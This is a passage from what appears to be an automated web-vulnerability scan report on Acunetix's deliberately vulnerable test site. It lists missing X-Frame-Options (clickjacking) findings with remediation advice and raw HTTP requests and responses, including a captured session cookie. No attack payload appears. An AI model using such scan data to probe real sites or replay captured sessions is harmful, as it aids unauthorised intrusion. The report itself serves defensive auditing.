value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 13914Response body (13914 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/default.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; 